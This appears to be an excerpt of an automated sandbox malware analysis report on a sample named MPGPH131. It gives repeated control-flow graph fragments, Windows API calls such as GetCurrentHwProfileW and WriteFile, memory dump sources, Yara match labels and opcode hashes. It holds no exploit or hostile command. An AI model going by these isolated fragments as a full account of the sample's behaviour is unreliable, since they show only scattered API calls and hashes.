                                    • Opcode Fuzzy Hash: 3f3aec8bfdeed507a4a5827318761ae281ce7c5ebfe7fcf0d35fcb71051dc98a
                                    • Instruction Fuzzy Hash: 6231E472505314ABC7219B28CC89B6BB7E5FFCA334F015F1DF9A4A32D0E370A8448692

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 73 4e1085d-4e1090a 81 4e10915-4e10924 GetCurrentHwProfileW 73->81 82 4e10932-4e10b8c call 4e10b92 81->82 111 4e10c05-4e10c08 82->111 112 4e10b8e-4e10b90 82->112 113 4e10c0b-4e10c11 111->113 114 4e10c13-4e10cdb 113->114 115 4e10b9e-4e10baa 113->115 130 4e10ce9 114->130 116 4e10b95 115->116 117 4e10bab-4e10c01 115->117 116->117 117->113 130->130
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: be312ef6e9ecdad1e8c62c7237d30ec2c325f9b24362cd098aaf5f159731128b
                                    • Instruction ID: 03e920ca8be93ced48ade69f7007aba29c0fab701ae31cc7016b0e8262258075
                                    • Opcode Fuzzy Hash: be312ef6e9ecdad1e8c62c7237d30ec2c325f9b24362cd098aaf5f159731128b
                                    • Instruction Fuzzy Hash: 3D5107FB78C114FDE10285811B54EF66B6EE7C723073060A6F543D6E22F2902AC57661

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 131 4e10806-4e1080b 132 4e10884-4e1090a 131->132 133 4e1080d-4e10815 131->133 147 4e10915-4e10924 GetCurrentHwProfileW 132->147 135 4e10817-4e1081a 133->135 136 4e1081c-4e10821 133->136 138 4e1082a-4e10849 call 4e1084b 135->138 136->138 148 4e10932-4e10b8c call 4e10b92 147->148 177 4e10c05-4e10c08 148->177 178 4e10b8e-4e10b90 148->178 179 4e10c0b-4e10c11 177->179 180 4e10c13-4e10cdb 179->180 181 4e10b9e-4e10baa 179->181 196 4e10ce9 180->196 182 4e10b95 181->182 183 4e10bab-4e10c01 181->183 182->183 183->179 196->196
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 4ce369961cce08919573acaa17aae64af8211114b588e834027fbb50c5f3cde4
                                    • Instruction ID: e520dbed18eccb97eda5ea52e2d1f9b8c66ac5a311adb286b9f4bbdf3affab6f
                                    • Opcode Fuzzy Hash: 4ce369961cce08919573acaa17aae64af8211114b588e834027fbb50c5f3cde4
                                    • Instruction Fuzzy Hash: 7E4126F77CC114BEE60286401B60AF66B6EEBC7230730A066F547D6D22F6912AC96271

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 197 3f2b5c-3f2b7e 198 3f2b84-3f2b86 197->198 199 3f2d71 197->199 200 3f2b88-3f2ba7 call 3e1de3 198->200 201 3f2bb2-3f2bd5 198->201 202 3f2d73-3f2d77 199->202 208 3f2baa-3f2bad 200->208 204 3f2bdb-3f2be1 201->204 205 3f2bd7-3f2bd9 201->205 204->200 207 3f2be3-3f2bf4 204->207 205->204 205->207 209 3f2c07-3f2c17 call 3f26a1 207->209 210 3f2bf6-3f2c04 call 3eb83d 207->210 208->202 215 3f2c19-3f2c1f 209->215 216 3f2c60-3f2c72 209->216 210->209 217 3f2c48-3f2c5e call 3f2272 215->217 218 3f2c21-3f2c24 215->218 219 3f2cc9-3f2ce9 WriteFile 216->219 220 3f2c74-3f2c7a 216->220 239 3f2c41-3f2c43 217->239 221 3f2c2f-3f2c3e call 3f2639 218->221 222 3f2c26-3f2c29 218->222 224 3f2ceb-3f2cf1 219->224 225 3f2cf4 219->225 226 3f2c7c-3f2c7f 220->226 227 3f2cb5-3f2cc7 call 3f271e 220->227 221->239 222->221 228 3f2d09-3f2d0c 222->228 224->225 232 3f2cf7-3f2d02 225->232 233 3f2ca1-3f2cb3 call 3f28e2 226->233 234 3f2c81-3f2c84 226->234 248 3f2c9c-3f2c9f 227->248 235 3f2d0f-3f2d11 228->235 241 3f2d6c-3f2d6f 232->241 242 3f2d04-3f2d07 232->242 233->248 234->235 243 3f2c8a-3f2c97 call 3f27f9 234->243 245 3f2d3f-3f2d4b 235->245 246 3f2d13-3f2d18 235->246 239->232 241->202 242->228 243->248 251 3f2d4d-3f2d53 245->251 252 3f2d55-3f2d67 245->252 249 3f2d1a-3f2d2c 246->249 250 3f2d31-3f2d3a call 3ea8c8 246->250 248->239 249->208 250->208 251->199 251->252 252->208
                                    APIs
                                    • WriteFile.KERNELBASE(?,00000000,003E6747,?,00000000,00000000,00000000,?,00000000,?,003DBC71,003E6747,00000000,003DBC71,?,?), ref: 003F2CE1
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FileWrite
                                    • String ID:
                                    • API String ID: 3934441357-0
                                    • Opcode ID: 00e91b5e8b8f79ae8937d31d7343c25fd4c9e4d4ac0c76bb869cd43812350e09
                                    • Instruction ID: df12038ed2186b4a77648efe2bbd5c760b05d016f4c0e456e534446d177e4302
                                    • Opcode Fuzzy Hash: 00e91b5e8b8f79ae8937d31d7343c25fd4c9e4d4ac0c76bb869cd43812350e09
                                    • Instruction Fuzzy Hash: 3361BCB190011DEFDF12DFA8C884EFFBBB9AF09304F150185EA10AB256D776D9019BA0

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 255 4e10879-4e1090a 262 4e10915-4e10924 GetCurrentHwProfileW 255->262 263 4e10932-4e10b8c call 4e10b92 262->263 292 4e10c05-4e10c08 263->292 293 4e10b8e-4e10b90 263->293 294 4e10c0b-4e10c11 292->294 295 4e10c13-4e10cdb 294->295 296 4e10b9e-4e10baa 294->296 311 4e10ce9 295->311 297 4e10b95 296->297 298 4e10bab-4e10c01 296->298 297->298 298->294 311->311
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f1435aa5f1c2cc511e949ca28a5f03015db7cbcc2c1ba27050eadd4429c494c6
                                    • Instruction ID: e04417c5352e25eb94c69aaf630cd346d9d5f264bcf392995f3472fa22b83dee
                                    • Opcode Fuzzy Hash: f1435aa5f1c2cc511e949ca28a5f03015db7cbcc2c1ba27050eadd4429c494c6
                                    • Instruction Fuzzy Hash: 0941F5F778C114BDF50286511B609FA6A6EEBC7330730A066F54795A22F2D02AC97171

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 312 4e108ad-4e1090a 318 4e10915-4e10924 GetCurrentHwProfileW 312->318 319 4e10932-4e10b8c call 4e10b92 318->319 348 4e10c05-4e10c08 319->348 349 4e10b8e-4e10b90 319->349 350 4e10c0b-4e10c11 348->350 351 4e10c13-4e10cdb 350->351 352 4e10b9e-4e10baa 350->352 367 4e10ce9 351->367 353 4e10b95 352->353 354 4e10bab-4e10c01 352->354 353->354 354->350 367->367
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: f70349623df4180127b630e0e5bc890499fc90c1b10795ddf74500edc1b9f9f8
                                    • Instruction ID: 913f8996d4a113173a3d5c6878ee2dae31cc68ce26095f205b874b7b0915c1b1
                                    • Opcode Fuzzy Hash: f70349623df4180127b630e0e5bc890499fc90c1b10795ddf74500edc1b9f9f8
                                    • Instruction Fuzzy Hash: 9031EEFB38C114BDF54686411B60EFA6A6EEBC7230730A062F547D5A22F6902AC97131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 368 4e108bf-4e1090a 372 4e10915-4e10924 GetCurrentHwProfileW 368->372 373 4e10932-4e10b8c call 4e10b92 372->373 402 4e10c05-4e10c08 373->402 403 4e10b8e-4e10b90 373->403 404 4e10c0b-4e10c11 402->404 405 4e10c13-4e10cdb 404->405 406 4e10b9e-4e10baa 404->406 421 4e10ce9 405->421 407 4e10b95 406->407 408 4e10bab-4e10c01 406->408 407->408 408->404 421->421
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 24d3e21659390c24b80bad4ec65bcc462599519863b943775e64a9c34709d601
                                    • Instruction ID: 3eda8de59097b3c85fb8f10c54b35e8d5e59773e29df9ed72c735116c93400c7
                                    • Opcode Fuzzy Hash: 24d3e21659390c24b80bad4ec65bcc462599519863b943775e64a9c34709d601
                                    • Instruction Fuzzy Hash: 0C31CDFB78C114BDF14686411B20EFA6A6EEBC7630730A063F547D6A22F6912AC96131

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 422 4e108c9-4e1090a 426 4e10915-4e10924 GetCurrentHwProfileW 422->426 427 4e10932-4e10b8c call 4e10b92 426->427 456 4e10c05-4e10c08 427->456 457 4e10b8e-4e10b90 427->457 458 4e10c0b-4e10c11 456->458 459 4e10c13-4e10cdb 458->459 460 4e10b9e-4e10baa 458->460 475 4e10ce9 459->475 461 4e10b95 460->461 462 4e10bab-4e10c01 460->462 461->462 462->458 475->475
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 9dcc926fbc75c5f10701123b4e03e07d87070714b63d6842b5349978405bb4f3
                                    • Instruction ID: b2f438657dc8bdd068b23b0b0d544245a4d351cfcb254bd9304af3133ea00fd8
                                    • Opcode Fuzzy Hash: 9dcc926fbc75c5f10701123b4e03e07d87070714b63d6842b5349978405bb4f3
                                    • Instruction Fuzzy Hash: E131E0FB38C114BDF14686511B20EFA6A6EEBC7730730A062F547D5A22F7912AC96531

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 476 4e108d9-4e1090a 478 4e10915-4e10924 GetCurrentHwProfileW 476->478 479 4e10932-4e10b8c call 4e10b92 478->479 508 4e10c05-4e10c08 479->508 509 4e10b8e-4e10b90 479->509 510 4e10c0b-4e10c11 508->510 511 4e10c13-4e10cdb 510->511 512 4e10b9e-4e10baa 510->512 527 4e10ce9 511->527 513 4e10b95 512->513 514 4e10bab-4e10c01 512->514 513->514 514->510 527->527
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 0820eea91b49623a8fefde26f4143212cbce0eebb1abbfff18892382cb1d9eda
                                    • Instruction ID: 4250ff3811abafcef8ee93375ce090ea98b0ca079c9f53d3698ce80c276309c1
                                    • Opcode Fuzzy Hash: 0820eea91b49623a8fefde26f4143212cbce0eebb1abbfff18892382cb1d9eda
                                    • Instruction Fuzzy Hash: DA31E2FB78C214FDF10685411A60EFA6A6EEBC7330730A066F547D6A12F7902AC96531

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 528 4e108f4-4e10924 GetCurrentHwProfileW 529 4e10932-4e10b8c call 4e10b92 528->529 558 4e10c05-4e10c08 529->558 559 4e10b8e-4e10b90 529->559 560 4e10c0b-4e10c11 558->560 561 4e10c13-4e10cdb 560->561 562 4e10b9e-4e10baa 560->562 577 4e10ce9 561->577 563 4e10b95 562->563 564 4e10bab-4e10c01 562->564 563->564 564->560 577->577
                                    APIs
                                    • GetCurrentHwProfileW.ADVAPI32(?), ref: 04E1091F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3744493837.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E10000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_4e10000_MPGPH131.jbxd
                                    Similarity
                                    • API ID: CurrentProfile
                                    • String ID:
                                    • API String ID: 2104809126-0
                                    • Opcode ID: 790b834ba0a95e6686fc55af5fd4693aeb63a8b52958b381d99ac3f83c251d4d
                                    • Instruction ID: 0c639f082b2d26a8df6fb844c03cc2a6a80521fc6e472b447de4fda45ec962eb
                                    • Opcode Fuzzy Hash: 790b834ba0a95e6686fc55af5fd4693aeb63a8b52958b381d99ac3f83c251d4d
                                    • Instruction Fuzzy Hash: AD3135FB78C214BEE20685501B24EFA6B6EEBC7730730A067F503D6A12F2811AC96171

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 578 36b6b0-36b6cf 579 36b6d5-36b6e8 578->579 580 36b7fc call 302040 578->580 581 36b713-36b71b 579->581 582 36b6ea 579->582 585 36b801 call 301fa0 580->585 586 36b724-36b734 581->586 587 36b71d-36b722 581->587 584 36b6ec-36b6f1 582->584 588 36b6f4-36b6f5 call 3dc950 584->588 595 36b806-36b80b call 3e1e70 585->595 590 36b736-36b73b 586->590 591 36b743-36b745 586->591 587->584 599 36b6fa-36b6ff 588->599 590->585 596 36b741 590->596 592 36b757 591->592 593 36b747-36b755 call 3dc950 591->593 598 36b759-36b77c 592->598 593->598 596->588 602 36b7d3-36b7f9 call 3de630 call 3debb0 598->602 603 36b77e-36b7a8 call 3de630 call 3debb0 598->603 599->595 604 36b705-36b711 599->604 614 36b7bc-36b7d0 call 3dcbd1 603->614 615 36b7aa-36b7b8 603->615 604->598 615->595 616 36b7ba 615->616 616->614
                                    APIs
                                    • Concurrency::cancel_current_task.LIBCPMT ref: 0036B801
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Concurrency::cancel_current_task
                                    • String ID:
                                    • API String ID: 118556049-0
                                    • Opcode ID: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction ID: ea656757d3a7544289a05b87099e9647513226a71083034232933395523a3f36
                                    • Opcode Fuzzy Hash: 617db6ab8b8d5904d46ca521fca4f6ec3a4692538c761b60814e4c8ab9871f96
                                    • Instruction Fuzzy Hash: CE4138739001159BCB17EF68DC8066EBBA9EF84350F15426AF805EB346D730EE518BE1

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 619 3f21d2-3f21e6 call 3f7d9e 622 3f21ec-3f21f4 619->622 623 3f21e8-3f21ea 619->623 625 3f21ff-3f2202 622->625 626 3f21f6-3f21fd 622->626 624 3f223a-3f225a call 3f7d0d 623->624 636 3f226c 624->636 637 3f225c-3f226a call 3ea8c8 624->637 629 3f2204-3f2208 625->629 630 3f2220-3f2230 call 3f7d9e FindCloseChangeNotification 625->630 626->625 628 3f220a-3f221e call 3f7d9e * 2 626->628 628->623 628->630 629->628 629->630 630->623 640 3f2232-3f2238 630->640 638 3f226e-3f2271 636->638 637->638 640->624
                                    APIs
                                    • FindCloseChangeNotification.KERNELBASE(00000000,00000000,CF830579,?,003F20B9,00000000,CF830579,00431090,0000000C,003F2175,003E627D,?), ref: 003F2228
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ChangeCloseFindNotification
                                    • String ID:
                                    • API String ID: 2591292051-0
                                    • Opcode ID: 0372f5acffbf1c4ec0b594400ca7c2017a6e67177f77953665f9bc8dfa46d564
                                    • Instruction ID: a8df544d65c8058968df076aca185e93aca8732fcdb3d408cb923e5e483d6687
                                    • Opcode Fuzzy Hash: 0372f5acffbf1c4ec0b594400ca7c2017a6e67177f77953665f9bc8dfa46d564
                                    • Instruction Fuzzy Hash: AB11893360822CA6D6233274AC82B7F2B898F82734F770629FB189F1D2DE71AC415194

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 645 3eb71c-3eb734 call 3f7d9e 648 3eb74a-3eb760 SetFilePointerEx 645->648 649 3eb736-3eb73d 645->649 650 3eb775-3eb77f 648->650 651 3eb762-3eb773 call 3ea8c8 648->651 652 3eb744-3eb748 649->652 650->652 653 3eb781-3eb796 650->653 651->652 654 3eb79b-3eb79e 652->654 653->654
                                    APIs
                                    • SetFilePointerEx.KERNELBASE(00000000,00000000,00430D48,003DBC71,00000002,003DBC71,00000000,?,?,?,003EB826,00000000,?,003DBC71,00000002,00430D48), ref: 003EB758
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FilePointer
                                    • String ID:
                                    • API String ID: 973152223-0
                                    • Opcode ID: c7ba99c37027e2d325543fcf4abc97dba2696ff1df7ec975d0e82be47d36ed79
                                    • Instruction ID: 193fcc36e931ff244fd4962b32edf18691d374f01615eeec3e6ad3c6bd972491
                                    • Opcode Fuzzy Hash: c7ba99c37027e2d325543fcf4abc97dba2696ff1df7ec975d0e82be47d36ed79
                                    • Instruction Fuzzy Hash: E701C8366105A5ABCF079F55DC41C9E7B59DF81320B250208F8519B2D1EB71ED419B90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 658 3dc950-3dc953 659 3dc962-3dc965 call 3eb5ec 658->659 661 3dc96a-3dc96d 659->661 662 3dc96f-3dc970 661->662 663 3dc955-3dc960 call 3eee98 661->663 663->659 666 3dc971-3dc975 663->666 667 301fa0-301ff0 call 301f80 call 3de5bb call 3ddd11 666->667 668 3dc97b 666->668 668->668
                                    APIs
                                    • ___std_exception_copy.LIBVCRUNTIME ref: 00301FDE
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000005CD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006AB000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006E8000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006F1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.00000000006FF000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3731154478.0000000000700000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733577613.00000000008AD000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733691530.00000000008AE000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733797853.00000000008B1000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3733912458.00000000008B2000.00000080.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_15_2_300000_MPGPH131.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ___std_exception_copy
                                    • String ID:
                                    • API String ID: 2659868963-0
                                    • Opcode ID: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
                                    • Instruction ID: 888deaddd1599a7eec76a846bd8bd0f658a924b08e7ef8ad274dbde810d19fc8
                                    • Opcode Fuzzy Hash: e4d0ae6aafb240b0b1d62e74c63eba1a2e240b5fb27b185dc81b8cce21acf58c
                                    • Instruction Fuzzy Hash: 07014E3641030EA7CB17ABA4FC1154A779C9E02360B508333F508AE6D1FB70E954C7D4
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,003DADBC,?,?,003F3439,00000001,00000364,?,00000006,000000FF,?,003DDD3B,?,?,?,?), ref: 003F3AF5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.3728599637.0000000000301000.00000040.00000001.01000000.00000009.sdmp, Offset: 00300000, based on PE: true
                                    • Associated: 0000000F.00000002.3728527720.0000000000300000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3728599637.0000000000433000.00000040.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729095758.0000000000437000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000000F.00000002.3729271658.000000000044A000.00000040.00000001.01000000.00000009.sdmpDownload File
